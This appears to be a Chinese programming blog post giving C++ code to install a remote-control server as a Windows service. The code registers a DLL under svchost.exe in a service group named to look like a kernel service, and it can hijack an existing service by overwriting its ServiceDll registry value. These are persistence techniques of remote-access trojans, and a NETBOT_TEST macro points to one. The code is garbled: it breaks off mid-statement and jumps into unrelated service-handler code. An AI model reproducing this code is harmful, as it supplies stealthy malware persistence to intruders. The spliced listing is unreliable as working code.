Windows服务之前已经进行了讲解,如何在安装Windows服务呢,作为远程控制的服务端。
安装Windows服务代码如下
#include "stdafx.h"
//#include <windows.h>
#include "InstallService.h"
#include <winsvc.h>
BOOL StartService(LPCTSTR lpService)
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
SERVICE_STATUS ServiceStatus;
DWORD dwErrorCode;
schSCManager=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//打开服务控制管理器数据库
if (schSCManager!=NULL)
{
schService=::OpenService(schSCManager,lpService,SERVICE_ALL_ACCESS);//获得服务对象的句柄
if (schService!=NULL)
{
//设置服务为自动启动
ChangeServiceConfig(schService, SERVICE_NO_CHANGE, SERVICE_AUTO_START, SERVICE_NO_CHANGE,
NULL, NULL, NULL, NULL, NULL, NULL, NULL);
if(StartService(schService,0,NULL)==0)//已经存在该服务,就启动服务
{
dwErrorCode=GetLastError();
if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
{
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return true;
}
}
while(QueryServiceStatus(schService,&ServiceStatus)!=0)
{
if(ServiceStatus.dwCurrentState==SERVICE_START_PENDING)
{
Sleep(100);
}
else
{
break;
}
}
CloseServiceHandle(schService);
}
CloseServiceHandle(schSCManager);
}
else
return FALSE;
return TRUE;
}
BOOL StopService(LPCTSTR lpService)
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
SERVICE_STATUS RemoveServiceStatus;
schSCManager=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//打开服务控制管理器数据库
if (schSCManager!=NULL)
{
schService=::OpenService(schSCManager,lpService,SERVICE_ALL_ACCESS);//获得服务对象的句柄
if (schService!=NULL)
{
//设置服务为禁用
ChangeServiceConfig(schService, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE,
NULL, NULL, NULL, NULL, NULL, NULL, NULL);
if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
{
if(RemoveServiceStatus.dwCurrentState!=SERVICE_STOPPED)//停止服务
{
if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
{
while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)
{
Sleep(10);
QueryServiceStatus(schService,&RemoveServiceStatus);
}
}
}
}
CloseServiceHandle(schService);
}
::CloseServiceHandle(schSCManager);
}
else
return FALSE;
return TRUE;
}
BOOL ReplaceSvchostService(LPCTSTR lpService,LPCTSTR lpDllPath)
{
int rc = 0;
HKEY hKey = 0;
BOOL bRet = FALSE;
char szOpenKey[MAX_PATH];
try
{
//暂停服务
StopService(lpService);
//修改dll指向
ZeroMemory(szOpenKey,sizeof(szOpenKey));
wsprintf(szOpenKey, "SYSTEM\\CurrentControlSet\\Services\\%s\\Parameters", lpService);
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, szOpenKey, 0, KEY_ALL_ACCESS, &hKey);
if(ERROR_SUCCESS != rc) throw "";
rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)lpDllPath, strlen(lpDllPath)+1);
SetLastError(rc);
if(ERROR_SUCCESS != rc) throw "RegSetValueEx(ServiceDll)";
//运行服务
bRet = StartService(lpService);
}
catch(char *str)
{
if(str && str[0])
{
rc = GetLastError();
}
}
RegCloseKey(hKey);
return bRet;
}
BOOL InstallSvchostService(LPCSTR strServiceName,
LPCSTR strDisplayName,
LPCSTR strDescription,
LPCSTR strDllPath)
{
int rc = 0;
HKEY hKey = 0;
BOOL bRet = FALSE;
char szOpenKey[MAX_PATH];
try
{
bRet = InstallService(strServiceName,
strDisplayName,
strDescription,
"%SystemRoot%\\System32\\svchost.exe -k krnlsrvc"); //安装服务
//修改dll指向
ZeroMemory(szOpenKey,sizeof(szOpenKey));
wsprintf(szOpenKey, "SYSTEM\\CurrentControlSet\\Services\\%s\\Parameters", strServiceName);
//rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, szOpenKey, 0, KEY_ALL_ACCESS, &hKey);
rc = RegCreateKey(HKEY_LOCAL_MACHINE, szOpenKey,&hKey);
if(ERROR_SUCCESS != rc) throw "";
rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)strDllPath, strlen(strDllPath)+1);
SetLastError(rc);
if(ERROR_SUCCESS != rc) throw "RegSetValueEx(ServiceDll)";
RegCloseKey(hKey);
//添加服务名到netsvcs组
ZeroMemory(szOpenKey,sizeof(szOpenKey));
strcpy(szOpenKey, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost");
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, szOpenKey, 0, KEY_ALL_ACCESS, &hKey);
if(ERROR_SUCCESS != rc) throw "RegOpenKeyEx(Svchost)";
rc = RegSetValueEx(hKey, "krnlsrvc", 0, REG_MULTI_SZ, (unsigned char*)strServiceName, strlen(strServiceName)+1);
SetLastError(rc);
if(ERROR_SUCCESS != rc) throw "RegSetValueEx(Svchost\\krnlsrvc)";
RegCloseKey(hKey);
bRet = StartService(strServiceName);
}
catch(char *su SERVICE_CONTROL_SHUTDOWN:
TellSCM( SERVICE_STOPPED, 0, 0 );
break;
}
}
int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress )
{
SERVICE_STATUS srvStatus;
srvStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
srvStatus.dwCurrentState = dwCurrState = dwState;
srvStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_SHUTDOWN;
srvStatus.dwWin32ExitCode = dwExitCode;
srvStatus.dwServiceSpecificExitCode = 0;
srvStatus.dwCheckPoint = dwProgress;
srvStatus.dwWaitHint = 3000;
return SetServiceStatus( hSrv, &srvStatus );
}
BOOL APIENTRY DllMain( HINSTANCE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
g_hDllModule = (HMODULE)hModule;
#ifdef NETBOT_TEST
CreateThread(NULL,NULL,RuningThread,NULL,NULL,NULL);
#endif //NETBOT_TEST
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
转播
